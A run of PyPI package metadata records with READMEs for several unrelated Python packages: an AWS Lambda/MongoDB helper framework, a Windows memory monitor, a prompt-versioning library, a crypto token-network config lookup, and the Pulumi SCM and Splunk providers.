}
})
)
# Returns immediately without waiting for the result
```
**Naming Convention:**
| Lambda Name (kebab-case) | Folder | File | Class |
|--------------------------|--------|------|-------|
| `generate-route` | `src/lambda/generate-route/` | `main.py` | `GenerateRouteLambda` |
| `sync-carrier` | `src/lambda/sync-carrier/` | `main.py` | `SyncCarrierLambda` |
| `process-payment` | `src/lambda/process-payment/` | `main.py` | `ProcessPaymentLambda` |
| `send-notification` | `src/lambda/send-notification/` | `main.py` | `SendNotificationLambda` |
**Common Use Cases:**
- Internal microservices communication
- Background data processing
- Integration with external services
- Scheduled tasks (with EventBridge)
- Step Functions workflows
- Cross-service operations
### Publish to SNS
**1. Create your topic** in `src/topic/title_indexed.py`:
```python
from aws_python_helper.sns.publisher import SNSPublisher
import os
class TitleIndexedTopic(SNSPublisher):
def __init__(self):
super().__init__(
topic_arn=os.getenv('TITLE_INDEXED_SNS_TOPIC_ARN')
)
async def publish_message(self, constitution_id, title):
await self.publish({
'constitution_id': constitution_id,
'title': title,
'event_type': 'title_indexed'
})
```
**2. Use the topic** from anywhere:
```python
from src.topics.title_indexed import TitleIndexedTopic
# In a consumer, API or task
topic = TitleIndexedTopic()
await topic.publish_indexed('123', 'My Constitution')
```
### Run a Fargate Task
**1. Create your task** in `src/task/search-tax-by-town/task.py`:
```python
from aws_python_helper.fargate.task_base import FargateTask
class SearchTaxByTownTask(FargateTask):
async def execute(self):
town = self.require_env('TOWN')
self.logger.info(f"Processing town: {town}")
# Access to DB
docs = await self.db.smart_data.address.find({'town': town}).to_list()
# Your logic here
for doc in docs:
# Process document
pass
```
**2. Create the entry point** in `src/task/search-tax-by-town/main.py`:
```python
from aws_python_helper.fargate.handler import fargate_handler
import sys
if __name__ == '__main__':
exit_code = fargate_handler('search-tax-by-town')
sys.exit(exit_code)
```
**3. Create the Dockerfile** in `src/task/search-tax-by-town/Dockerfile`:
```dockerfile
FROM python:3.10.12-slim
WORKDIR /app
# Install dependencies
COPY requirements.txt /app/framework_requirements.txt
COPY src/task/search-tax-by-town/requirements.txt /app/task_requirements.txt
RUN pip install -r /app/framework_requirements.txt && \
pip install -r /app/task_requirements.txt
# Copy code
COPY aws_python_helper /app/aws_python_helper
COPY config.py /app/config.py
COPY task /app/task
COPY task/search-tax-by-town/main.py /app/main.py
ENV PYTHONUNBUFFERED=1
CMD ["python", "main.py"]
```
**4. Invoke from Lambda**:
```python
from aws_python_helper.fargate.executor import FargateExecutor
def handler(event, context):
executor = FargateExecutor()
task_arn = executor.run_task(
'search-tax-by-town',
envs={'town': 'Norwalk', 'only_tax': 'true'}
)
return {'taskArn': task_arn}
```
## 🗄️ Access to MongoDB
The framework provides flexible access to multiple databases:
```python
class MyAPI(API):
async def process(self):
# Access to different databases
user = await self.db.users_db.users.find_one({'_id': user_id})
# Another database
await self.db.analytics_db.logs.insert_one({'action': 'view'})
# Multiple collections
titles = await self.db.constitution_db.titles.find().to_list(100)
articles = await self.db.constitution_db.articles.find().to_list(100)
```
## 🔄 Routing Convention
The framework uses convention over configuration for the routing:
| Request | Loaded file |
|---------|----------------|
| `GET /users` | `api/users/list.py` |
| `GET /users/123` | `api/users/get.py` |
| `POST /users` | `api/users/post.py` |
| `PUT /users/123` | `api/users/put.py` |
| `DELETE /users/123` | `api/users/delete.py` |
| `GET /users/123/posts` | `api/users/posts/list.py` |
| `GET /users/123/posts/456` | `api/users/posts/get.py` |
**Logic:**
- The parts with **even indices** (0,2,4...) are **directories**
- The parts with **odd indices** (1,3,5...) are **path parameters**
- `GET` with **odd number of parts** → **list** method
- `GET` with **even number of parts** → **get** method
- Other methods use their name directly
## 🎯 Complete Example
```python
# src/api/constitutions/list.py
from aws_python_helper.api.base import API
class ConstitutionListAPI(API):
async def validate(self):
if 'limit' in self.data:
limit = int(self.data['limit'])
if limit > 1000:
raise ValueError("Limit cannot exceed 1000")
async def process(self):
# Build filters
filters = {}
if 'country' in self.data:
filters['country'] = self.data['country']
# Query MongoDB
limit = int(self.data.get('limit', 100))
results = await self.db.constitution_db.constitutions.find(
filters
).limit(limit).to_list(limit)
# Count total
total = await self.db.constitution_db.constitutions.count_documents(filters)
# Register in analytics
await self.db.analytics_db.searches.insert_one({
'filters': filters,
'result_count': len(results)
})
# Response
self.set_body({
'data': results,
'total': total
})
self.set_header('X-Total-Count', str(total))
```
## 🔗 Integration Example: API + Standalone Lambda
Here's a complete example showing how an API can invoke a standalone lambda:
**Scenario:** An API endpoint that creates a shipping and then asynchronously generates its route using a standalone lambda.
**1. The API endpoint** (`src/api/shippings/post.py`):
```python
from aws_python_helper.api.base import API
import boto3
import json
class ShippingPostAPI(API):
async def validate(self):
required_fields = ['customer_id', 'address', 'items']
for field in required_fields:
if field not in self.data:
raise ValueError(f"{field} is required")
async def process(self):
# Create shipping in database
shipping = {
'customer_id': self.data['customer_id'],
'address': self.data['address'],
'items': self.data['items'],
'status': 'pending',
'route_pending': True
}
result = await self.db.deliveries.shippings.insert_one(shipping)
shipping_id = str(result.inserted_id)
# Invoke standalone lambda asynchronously to generate route
lambda_client = boto3.client('lambda')
lambda_client.invoke(
FunctionName='GenerateRouteLambda',
InvocationType='Event', # Asynchronous
Payload=json.dumps({
'data': {'shipping_id': shipping_id}
})
)
self.set_code(201)
self.set_body({
'shipping_id': shipping_id,
'status': 'pending',
'message': 'Shipping created, route generation in progress'
})
```
**2. The standalone lambda** (`src/lambda/generate-route/main.py`):
```python
from aws_python_helper.lambda_standalone.base import Lambda
class GenerateRouteLambda(Lambda):
async def validate(self):
if 'shipping_id' not in self.data:
raise ValueError("shipping_id is required")
async def process(self):
shipping_id = self.data['shipping_id']
# Get shipping details
shipping = await self.db.deliveries.shippings.find_one(
{'_id': shipping_id}
)
if not shipping:
raise ValueError(f"Shipping {shipping_id} not found")
# Generate optimal route
route = await self.calculate_optimal_route(shipping)
# Save route
route_result = await self.db.deliveries.routes.insert_one(route)
# Update shipping
await self.db.deliveries.shippings.update_one(
{'_id': shipping_id},
{'$set': {
'route_id': route_result.inserted_id,
'route_pending': False,
'status': 'scheduled'
}}
)
return {
'route_id': str(route_result.inserted_id),
'shipping_id': shipping_id
}
async def calculate_optimal_route(self, shipping):
# Your route calculation logic here
return {
'shipping_id': shipping['_id'],
'carrier_id': shipping.get('carrier_id'),
'estimated_duration': 60,
'status': 'pending'
}
```
**3. Configure handlers** (`src/handlers/lambda_handler.py`):
```python
from aws_python_helper.lambda_standalone.handler import lambda_handler
generate_route_handler = lambda_handler('generate-route')
__all__ = ['generate_route_handler']
```
**Benefits of this pattern:**
- API responds immediately (better UX)
- Route generation happens in the background
- Decoupled services (easier to maintain)
- Can retry lambda independently if it fails
- Scalable architecture
## 🔐 Environment Variables
### MongoDB Configuration
El framework soporta dos formas de configurar MongoDB:
#### Opción 1: Connection String Completa
```bash
# URI completa con credenciales incluidas
MONGODB_URI=mongodb+srv://user:password@cluster.mongodb.net/dbname?retryWrites=true&w=majority
# o
MONGO_DB_URI=mongodb+srv://user:password@cluster.mongodb.net/dbname
```
#### Opción 2: Componentes Separados (Recomendado para Terraform)
```bash
# Host sin credenciales
MONGO_DB_HOST=mongodb+srv://cluster.mongodb.net
# Credenciales separadas (más seguro)
MONGO_DB_USER=admin
MONGO_DB_PASSWORD=my-secure-password
# Opcionales
MONGO_DB_NAME=my_database
MONGO_DB_OPTIONS=retryWrites=true&w=majority
```
**Ventajas de usar componentes separados:**
- ✅ Mejor seguridad: credenciales separadas del host
- ✅ Fácil integración con Terraform/AWS Secrets Manager
- ✅ Contraseñas con caracteres especiales se manejan automáticamente
- ✅ Más flexible para diferentes entornos
El framework automáticamente:
1. URL-encodea la contraseña (maneja `@`, `:`, `/`, etc.)
2. Construye la URI completa
3. Inicializa la conexión
### Ejemplo en Terraform
```hcl
environment_variables = {
MONGO_DB_HOST = module.mongodb.connection_string
MONGO_DB_USER = module.mongodb.database_user
MONGO_DB_PASSWORD = module.mongodb.database_password
}
```
## Rest Environment Variables
## 📊 Advanced Features
### SNS Publisher - Batch Publishing
```python
# Publish multiple messages
topic = TitleIndexedTopic()
await topic.publish_batch_indexed([
{'constitution_id': 'id1', 'title': 'Title 1'},
{'constitution_id': 'id2', 'title': 'Title 2'},
{'constitution_id': 'id3', 'title': 'Title 3'}
])
```
### Fargate - Run multiple tasks
```python
executor = FargateExecutor()
task_arns = executor.run_task_batch(
'search-tax-by-town',
[
{'town': 'Norwalk'},
{'town': 'Stamford'},
{'town': 'Bridgeport'}
]
)
```
### Fargate - Check task status
```python
executor = FargateExecutor()
task_arn = executor.run_task('my-task', {'param': 'value'})
# Check task status
status = executor.get_task_status(task_arn)
print(f"Status: {status['status']}")
print(f"Started at: {status['started_at']}")
```
### SNS - Message Attributes
```python
# Publish with attributes for SNS filtering
topic = ConstitutionCreatedTopic()
await topic.publish_created(
constitution_id='123',
title='New Constitution',
country='Ecuador',
year=2023,
created_by='user_456',
attributes={'priority': 'high', 'region': 'latam'}
)
```
## 🤝 Contributing
If you find bugs or want to add features, please create a PR!
## 📄 License
MIT
| text/markdown | null | Fabian Claros <neufabiae@gmail.com> | null | null | MIT | aws, python, framework, helper, mongodb, sqs, sns, fargate, lambda | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"motor==3.3.2",
"pymongo==4.6.1",
"bcrypt>=4.0.0"
] | [] | [] | [] | [
"Homepage, https://github.com/fabiae/aws-python-framework",
"Source Code, https://github.com/fabiae/aws-python-framework",
"Bug Tracker, https://github.com/fabiae/aws-python-framework/issues",
"Documentation, https://github.com/fabiae/aws-python-framework/blob/main/README.md"
] | twine/6.2.0 CPython/3.12.3 | 2026-02-20T06:49:43.561897 | aws_python_helper-0.29.0.tar.gz | 44,754 | e3/1b/97241cd380a5a31dd9a28a7fd1345a6f8ce33bcb943ccace539b754e8b6c/aws_python_helper-0.29.0.tar.gz | source | sdist | null | false | b25141ead8c7262adfe64ec51b57bfa8 | 420702cf5355dbf3b6b557d757832efeef23ac5d9b028a8ea430299bd29934b8 | e31b97241cd380a5a31dd9a28a7fd1345a6f8ce33bcb943ccace539b754e8b6c | null | [] | 232 |
2.4 | opencode-mem-guard | 0.4.3 | OpenCode memory leak monitor & zombie process reclaimer with system tray UI | # OpenCode MemGuard
🛡️ OpenCode 内存泄漏监控与僵尸进程回收工具。
360 风格桌面悬浮球 + 系统托盘,实时监控 Node.js 进程内存,自动回收僵尸进程。
## 功能
- **360 式悬浮球**:实时显示 RAM 使用率,拖拽、边缘吸附、悬停展开详情
- **系统托盘**:右键菜单控制自动回收、开机自启、查看日志
- **内存泄漏检测**:滑动窗口线性回归,自动识别内存增长趋势
- **僵尸进程回收**:自动检测并终止空闲 node.exe,释放内存
- **实时日志查看器**:深色主题窗口,实时滚动显示监控日志
- **开机自启**:Windows 注册表自启动管理
## 系统要求
- Windows 10/11
- Python >= 3.10
## 安装
```bash
pip install opencode-mem-guard
```
## 使用
```bash
# 标准模式:悬浮球 + 托盘
opencode-mem-guard
# 后台运行(无控制台窗口,关终端不退出)
pythonw -m opencode_mem_guard
# 仅托盘模式
opencode-mem-guard --no-ball
# 试运行(不杀进程)
opencode-mem-guard --dry-run
```
## 参数
| 参数 | 说明 |
|------|------|
| `--no-ball` | 不显示悬浮球 |
| `--no-tray` | 不显示托盘图标 |
| `--no-reclaim` | 禁用自动回收 |
| `--dry-run` | 试运行模式 |
| `-i, --interval` | 采集间隔秒数,默认 5 |
| `--data-dir` | 数据目录,默认 `~/.opencode-mem-guard/data/` |
## License
MIT
| text/markdown | null | Fiyen <623320480@qq.com>, "Claude (claude-opus-4-6)" <noreply@anthropic.com> | null | null | null | leak, memory, monitor, opencode, tray | [
"Development Status :: 4 - Beta",
"Environment :: Win32 (MS Windows)",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: Microsoft :: Windows",
"Programming Language :: Python :: 3",
"Topic :: System :: Monitoring"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"pillow>=10.0",
"psutil>=5.9",
"pystray>=0.19"
] | [] | [] | [] | [
"Homepage, https://github.com/fiyen/opencode-mem-guard"
] | twine/6.2.0 CPython/3.12.7 | 2026-02-20T06:49:39.411759 | opencode_mem_guard-0.4.3.tar.gz | 92,847 | d5/e2/58659bfeb5556a6f5c0918376bab8fdc1db29ad3129d35b34e3162902a85/opencode_mem_guard-0.4.3.tar.gz | source | sdist | null | false | fd233e54634992efad3f2b78b191cfaa | fc7a642668f004defb98fea62e9d6de9c86cb99c94ea68287e8327e002b876f3 | d5e258659bfeb5556a6f5c0918376bab8fdc1db29ad3129d35b34e3162902a85 | MIT | [] | 223 |
2.4 | llmpromptvault | 0.1.0 | Version, compare, and manage your LLM prompts. No API keys required. Bring your own model. | # PromptVault 🔐
> **Version and compare your LLM prompts. No API key required. Bring your own model.**
[](https://pypi.org/project/promptvault/)
[](https://www.python.org/)
[](LICENSE)
---
## What PromptVault Does
PromptVault is a **prompt management library** — not an LLM client. It does three things:
1. **Versions your prompts** — tracks every change like Git
2. **Logs responses** — stores what each prompt returned, with latency and token counts
3. **Compares prompts** — shows you side-by-side how two prompt versions perform
**PromptVault never calls any LLM.** You call your own model however you like — OpenAI, Claude, Gemini, Ollama, a local model, anything. You pass the response to PromptVault and it handles the rest.
---
## Installation
```bash
pip install promptvault
```
Only one dependency: `pyyaml`. Everything else uses Python's standard library.
---
## Quick Start
```python
from promptvault import Prompt, Compare
# 1. Define two versions of a prompt
v1 = Prompt("summarize", template="Summarize this: {text}", version="v1")
v2 = Prompt("summarize", template="Summarize in 3 bullet points: {text}", version="v2")
# 2. YOU call your LLM (any model, any way you like)
r1 = your_llm(v1.render(text="Some article content..."))
r2 = your_llm(v2.render(text="Some article content..."))
# 3. PromptVault compares and logs them
cmp = Compare(v1, v2)
cmp.log(r1, r2)
cmp.show()
```
Output:
```
────────────────────────────────────────────────────────────
PROMPTVAULT COMPARISON
────────────────────────────────────────────────────────────
Prompt A summarize (v1)
Prompt B summarize (v2)
────────────────────────────────────────────────────────────
── Response A ──
Here is a summary of the article...
── Response B ──
• Key point one
• Key point two
• Key point three
────────────────────────────────────────────────────────────
Metric Prompt A Prompt B
──────────────────────────── ──────────── ────────────
Word count 12 18
Char count 68 112
Latency (ms) 820.0 950.0
Tokens 45 62
────────────────────────────────────────────────────────────
```
---
## Core API
### `Prompt` — Define and version your prompts
```python
from promptvault import Prompt
# Create a prompt
p = Prompt(
name="classify",
template="Classify this text as positive or negative: {text}",
version="v1",
description="Sentiment classifier",
tags=["classify", "sentiment"],
)
# See required variables
p.variables() # ['text']
# Render it (just string formatting — no LLM call)
rendered = p.render(text="I love this product!")
# YOU call your LLM
response = your_llm(rendered)
# Log the response
p.log(
rendered_prompt=rendered,
response=response,
model="gpt-4o-mini", # optional
latency_ms=820, # optional
tokens=45, # optional
)
# View stats across all logged runs
p.stats()
# {
# 'run_count': 10,
# 'avg_latency_ms': 750.0,
# 'avg_tokens': 42.0,
# 'models_used': ['gpt-4o-mini'],
# ...
# }
# View raw run history
p.runs(last_n=10)
```
### Versioning
```python
# Create v2 — v1 is automatically preserved in history
v2 = p.update(
new_template="You are a sentiment expert. Classify as positive/negative/neutral: {text}"
)
# Auto-increments: v1 → v2. Or pass version="my-version"
# See all versions
p.history() # [{'version': 'v1', 'template': ..., ...}, {'version': 'v2', ...}]
```
### Save & Load YAML
```python
# Export to a human-readable file
p.save("prompts/classify.yaml")
# Load it back anywhere
p = Prompt.load("prompts/classify.yaml")
```
```yaml
# prompts/classify.yaml
name: classify
version: v1
description: Sentiment classifier
template: 'Classify this text as positive or negative: {text}'
tags:
- classify
- sentiment
```
---
### `Compare` — Side-by-side prompt comparison
```python
from promptvault import Compare
cmp = Compare(v1, v2)
# Log one comparison pair
cmp.log(
response_a=response_v1,
response_b=response_v2,
model="llama3", # optional
latency_ms_a=820, # optional
latency_ms_b=950, # optional
tokens_a=45, # optional
tokens_b=62, # optional
)
# Print side-by-side to terminal
cmp.show()
# Get structured diff dict
cmp.diff()
# {
# 'response_a': '...', 'response_b': '...',
# 'words_a': 12, 'words_b': 18,
# 'latency_ms_a': 820, 'latency_ms_b': 950,
# ...
# }
# Aggregate summary across multiple comparison runs
cmp.summary()
# {
# 'total_comparisons': 5,
# 'avg_words_a': 12.0, 'avg_words_b': 18.2,
# 'avg_latency_ms_a': 810.0, 'avg_latency_ms_b': 940.0,
# ...
# }
```
---
### `Registry` — Share prompts with your team
```python
from promptvault import Registry
reg = Registry("./shared_prompts") # any folder path
# Push prompts in
reg.push(v1)
reg.push(v2)
# Pull them out anywhere
p = reg.pull("classify") # latest version
p = reg.pull("classify", "v1") # specific version
reg.list() # ['classify', 'summarize', ...]
reg.versions("classify") # ['v1', 'v2']
reg.delete("classify", "v1")
```
---
## Works with Any LLM
Because PromptVault never makes LLM calls itself, it works with literally any model:
```python
# OpenAI
import openai
client = openai.OpenAI(api_key="...")
response = client.chat.completions.create(model="gpt-4o", messages=[{"role": "user", "content": rendered}])
p.log(rendered, response.choices[0].message.content, model="gpt-4o")
# Anthropic
import anthropic
client = anthropic.Anthropic(api_key="...")
response = client.messages.create(model="claude-haiku-4-5-20251001", max_tokens=1024, messages=[{"role": "user", "content": rendered}])
p.log(rendered, response.content[0].text, model="claude-haiku-4-5-20251001")
# Ollama (local, free, no key)
import requests
response = requests.post("http://localhost:11434/api/generate", json={"model": "llama3", "prompt": rendered, "stream": False})
p.log(rendered, response.json()["response"], model="llama3")
# Any other LLM, API, or local model
response = any_llm_you_want(rendered)
p.log(rendered, response)
```
---
## File Structure
```
your_project/
├── prompts/
│ └── classify.yaml ← exported prompt templates
├── .promptvault/
│ ├── history.json ← version history
│ └── runs.db ← run logs (SQLite)
└── main.py
```
Add `.promptvault/` to `.gitignore` to keep run logs local, or commit it to share analytics with your team.
---
## Run the Demo
```bash
git clone https://github.com/your-username/promptvault
cd promptvault
pip install pyyaml
python examples/demo.py
```
No API key needed — the demo uses simulated responses.
---
## Publish to PyPI
```bash
pip install build twine
python -m build
twine upload dist/*
```
See `PUBLISHING_GUIDE.md` for the full step-by-step.
---
## License
MIT © PromptVault Contributors
| text/markdown | null | Ankur Srivastav <ankursrivastava98@gmail.com> | null | null | MIT | llm, prompts, prompt-engineering, prompt-management, versioning, mlops, ai, comparison, testing | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Artificial Intelligence",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Software Development :: Version Control"
] | [] | null | null | >=3.9 | [] | [] | [] | [
"pyyaml>=6.0",
"pytest>=7.0; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\"",
"black>=23.0; extra == \"dev\"",
"build; extra == \"dev\"",
"twine; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T06:49:01.662952 | llmpromptvault-0.1.0.tar.gz | 15,115 | 64/6e/a594e5d39173f407f475b36373002334be14dddbc4657a663984fbf15220/llmpromptvault-0.1.0.tar.gz | source | sdist | null | false | 6564b61e699edb9ca55fe93b044182e6 | 9bf6a4c4ab94a1229a02d845c78989466ca7c93497ecb7b1976dd6a2acc4e3a2 | 646ea594e5d39173f407f475b36373002334be14dddbc4657a663984fbf15220 | null | [
"LICENSE"
] | 254 |
2.4 | token-network | 0.1.1 | Validate input and return token network config (e.g. network.bitcoin, network.bsc.usdt) | # token-network
Python library that validates input and returns token network config. Resolve networks and tokens by name/symbol and get merged config (e.g. USDT on BSC with contract address and decimals).
## Install
```bash
pip install token-network
```
From source (development):
```bash
pip install -e .
```
## Quick start
```python
from token_network import network, get_network, get_token, get_token_network, TokenNetworkError
# Attribute access
network.bitcoin.config # Bitcoin network config
network.bsc.usdt # USDT on BSC (contract, decimal, etc.)
# By name/symbol
get_network("bitcoin") # Full network data
get_token("USDT") # Token info by symbol, slug, or name
get_token_network("USDT", "bsc") # Token-on-network config
```
---
## API reference
All identifiers (network name, token symbol/slug/name) are **case-insensitive**. Unknown network or token raises `TokenNetworkError`.
### Attribute access: `network`
Use `network.<network>` and optionally `network.<network>.<token>` for direct access.
| Usage | Returns |
|--------|--------|
| `network.bitcoin` | Network node (see below) |
| `network.bitcoin.config` | Network config dict |
| `network.bitcoin.tokens` | List of token bindings on this network |
| `network.bitcoin.to_dict()` | `{"config": {...}, "tokens": [...]}` |
| `network.bsc.usdt` | Token-on-network dict (network + token + contract_address, decimal, native) |
**Example**
```python
network.bitcoin.config
# {'network_type': 'UTXO', 'token_standard': 'BTC', 'base_token': 'BTC', 'base_token_decimal': 8, ...}
network.bsc.usdt
# {'network': {...}, 'token': {...}, 'contract_address': '0x55d398326f99059fF775485246999027B3197955', 'decimal': 18, 'native': False}
```
---
### `get_networks()`
Returns a sorted list of all network ids.
**Returns:** `list[str]` — e.g. `['bitcoin', 'bsc', 'dogecoin', 'ethereum', 'ripple', 'solana', 'tron']`
**Example**
```python
from token_network import get_networks
get_networks()
# ['bitcoin', 'bsc', 'dogecoin', 'ethereum', 'ripple', 'solana', 'tron']
```
Also available as `network.get_networks()`.
---
### `get_tokens()`
Returns a sorted list of all token symbols.
**Returns:** `list[str]` — e.g. `['AAVE', 'BNB', 'BTC', 'ETH', 'USDT', ...]`
**Example**
```python
from token_network import get_tokens
get_tokens()
# ['AAVE', 'BNB', 'BTC', 'DOGE', 'ETH', 'LINK', 'SHIB', 'SOL', 'TRX', 'UNI', 'USDC', 'USDT', 'XRP']
```
Also available as `network.get_tokens()`.
---
### `get_token(identifier)`
Get token object by **symbol**, **slug**, or **name** (case-insensitive).
**Parameters**
- `identifier` — Token symbol (e.g. `USDT`), slug (e.g. `usdt`), or name (e.g. `tether`).
**Returns:** `dict` — Token info: `slug`, `symbol`, `standard_symbol`, `name`, `precision`, `factor`.
**Raises:** `TokenNetworkError` if no token matches.
**Example**
```python
from token_network import get_token
get_token("USDT")
# {'slug': 'usdt', 'symbol': 'USDT', 'standard_symbol': 'USDT', 'name': 'tether', 'precision': 6, 'factor': '1e6'}
get_token("tether") # same
get_token("btc") # Bitcoin token info
```
Also available as `network.get_token(identifier)`.
---
### `get_network(identifier)`
Get network object by **network name/id** (case-insensitive).
**Parameters**
- `identifier` — Network name (e.g. `bitcoin`, `bsc`, `ethereum`).
**Returns:** `dict` with keys:
- `config` — Network config (network_type, token_standard, base_token, confirmation_number, etc.).
- `tokens` — List of token bindings on this network.
**Raises:** `TokenNetworkError` if network is unknown.
**Example**
```python
from token_network import get_network
get_network("bitcoin")
# {'config': {'network_type': 'UTXO', 'base_token': 'BTC', ...}, 'tokens': [...]}
get_network("BSC")
```
Also available as `network.get_network(identifier)`. Same shape as `network.bitcoin.to_dict()`.
---
### `get_token_network(token_identifier, network_identifier)`
Get token_network config for a **token** on a **network** (case-insensitive).
**Parameters**
- `token_identifier` — Token symbol, slug, or name (e.g. `USDT`, `usdt`, `tether`).
- `network_identifier` — Network name (e.g. `bsc`, `ethereum`).
**Returns:** `dict` with keys:
- `network` — Network config.
- `token` — Token info (slug, symbol, name, precision, factor).
- `contract_address` — Contract address or `None` for native.
- `decimal` / `decimals` — Decimals on this network.
- `native` / `type` — Whether it is the chain’s native asset.
**Raises:** `TokenNetworkError` if token or network is unknown, or if the token is not on that network.
**Example**
```python
from token_network import get_token_network
get_token_network("USDT", "bsc")
# {'network': {...}, 'token': {...}, 'contract_address': '0x55d398326f99059fF775485246999027B3197955', 'decimal': 18, 'native': False}
get_token_network("tether", "BSC") # same
get_token_network("ETH", "ethereum")
```
Same data as `network.bsc.usdt`. Also available as `network.get_token_network(token_identifier, network_identifier)`.
---
### `TokenNetworkError`
Exception raised when:
- A network name is unknown.
- A token (symbol/slug/name) is unknown.
- A token is requested on a network where it is not defined.
**Example**
```python
from token_network import get_network, get_token, get_token_network, TokenNetworkError
try:
get_network("unknown_chain")
except TokenNetworkError as e:
print(e) # Unknown network: 'unknown_chain'. Known networks: bitcoin, bsc, ...
try:
get_token("unknown_token")
except TokenNetworkError as e:
print(e) # Unknown token: 'unknown_token'. Known tokens: [...]
try:
get_token_network("SHIB", "bitcoin")
except TokenNetworkError as e:
print(e) # Token 'SHIB' is not on network 'bitcoin'. Available on this network: ['BTC']
```
---
## Data sources
Config is loaded from YAML in the package’s `data` directory:
| File | Content |
|------|--------|
| `networks.yaml` | Chain config (network_type, token_standard, base_token, confirmation_number, …) |
| `tokens.yaml` | Token definitions (symbol, slug, name, precision, factor) |
| `token_networks.yaml` | Token–network bindings (contract_address, decimal, native) |
To change data, edit the YAML files in `token_network/data/`.
---
## Publishing to PyPI
To allow `pip install token-network` from PyPI:
1. Create an account on [pypi.org](https://pypi.org).
2. `pip install build twine`
3. `python -m build` then `twine upload dist/*`
For testing: `twine upload --repository testpypi dist/*`, then
`pip install --index-url https://test.pypi.org/simple/ token-network`.
---
## Development
```bash
pip install -e ".[dev]"
pytest
```
| text/markdown | null | null | null | null | MIT | blockchain, tokens, networks, crypto, config | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"PyYAML>=6.0",
"pytest>=7.0; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.3 | 2026-02-20T06:48:42.266919 | token_network-0.1.1.tar.gz | 11,491 | 8f/ab/8bd4e3945aa2f1cc9f5c54ac8a3d66c10e2525ed1d1cfdc5bbc486a7e826/token_network-0.1.1.tar.gz | source | sdist | null | false | 4edc1d846bd4f618c2718c555a17b43a | a8f8a190c8ca4e4184e1d07a41baf7c6af77a9bfd03dc850c03c1eadb1b86ceb | 8fab8bd4e3945aa2f1cc9f5c54ac8a3d66c10e2525ed1d1cfdc5bbc486a7e826 | null | [] | 236 |
2.4 | pulumi-scm | 1.1.0a1771569449 | A Pulumi package for managing resources on Strata Cloud Manager. | # Strata Cloud Manager Resource Provider
A Pulumi package for managing resources on a [Strata Cloud Manager](https://www.pulumi.com/registry/packages/scm/) instance.
## Installing
This package is available for several languages/platforms:
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/scm
```
or `yarn`:
```bash
yarn add @pulumi/scm
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_scm
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-scm/sdk/go/...
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Scm
```
## Reference
For detailed reference documentation, please visit [the Pulumi registry](https://www.pulumi.com/registry/packages/scm/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, scm, paloaltonetworks, category/network | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.com",
"Repository, https://github.com/pulumi/pulumi-scm"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:47:47.450559 | pulumi_scm-1.1.0a1771569449.tar.gz | 950,986 | cd/f3/fccf2b821b94a6ebf2f28c0f33d6926c8e3e351eba9e40d7e83d280f38db/pulumi_scm-1.1.0a1771569449.tar.gz | source | sdist | null | false | 6e2bac1b706724f78da7df1047d09324 | 5023eece42a1f2e46f47a42988d9ef8a693282713e0f9e8aab2d679281b01362 | cdf3fccf2b821b94a6ebf2f28c0f33d6926c8e3e351eba9e40d7e83d280f38db | null | [] | 213 |
2.4 | pulumi-splunk | 1.3.0a1771569595 | A Pulumi package for creating and managing splunk cloud resources. | [](https://github.com/pulumi/pulumi-splunk/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/splunk)
[](https://pypi.org/project/pulumi-splunk)
[](https://badge.fury.io/nu/pulumi.splunk)
[](https://pkg.go.dev/github.com/pulumi/pulumi-splunk/sdk/go)
[](https://github.com/pulumi/pulumi-splunk/blob/master/LICENSE)
# Splunk Resource Provider
The Splunk Resource Provider lets you manage Splunk resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/splunk
or `yarn`:
$ yarn add @pulumi/splunk
### Python
To use from Python, install using `pip`:
$ pip install pulumi_splunk
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-splunk/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Splunk
## Configuration
The following configuration points are available:
- `splunk:url` - (Required) The URL for the Splunk instance to be configured. (The provider uses `https` as the default schema as prefix to the URL)
It can also be sourced from the `SPLUNK_URL` environment variable.
- `splunk:username` - (Optional) The username to access the Splunk instance to be configured. It can also be sourced
from the `SPLUNK_USERNAME` environment variable.
- `splunk:password` - (Optional) The password to access the Splunk instance to be configured. It can also be sourced
from the `SPLUNK_PASSWORD` environment variable.
- `splunk:authToken` - (Optional) Use auth token instead of username and password to configure Splunk instance. If specified, auth token takes priority over username/password.
It can also be sourced from the `SPLUNK_AUTH_TOKEN` environment variable.
